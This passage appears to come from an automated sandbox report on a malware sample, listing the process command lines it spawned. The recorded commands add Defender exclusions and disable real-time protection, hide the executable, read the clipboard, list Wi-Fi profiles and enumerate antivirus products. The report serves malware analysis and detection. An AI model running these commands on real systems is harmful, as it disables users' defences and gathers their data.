                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
                                                                                                                                                                                                                              Imagebase:0x7c0000
                                                                                                                                                                                                                              File size:13'312 bytes
                                                                                                                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                              Start time:01:19:20
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                              Start time:01:19:21
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                              Start time:01:19:21
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f330000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 01:19:21
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: wmic csproduct get uuid
Imagebase: 0xf90000
File size: 427'008 bytes
MD5 hash: E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase: 0xf0000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase: 0xf0000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 01:19:25
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 01:19:26
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: wmic path win32_VideoController get name
Imagebase: 0xf90000
File size: 427'008 bytes
MD5 hash: E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:01:19:27
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:01:19:27
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:01:19:27
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe""
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                              Start time:01:19:30
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
                                                                                                                                                                                                                              Imagebase:0x340000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist /FO LIST
Imagebase: 0xb00000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 01:19:31
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 50
Start time: 01:19:32
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 01:19:32
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist /FO LIST
Imagebase: 0xb00000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:60
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
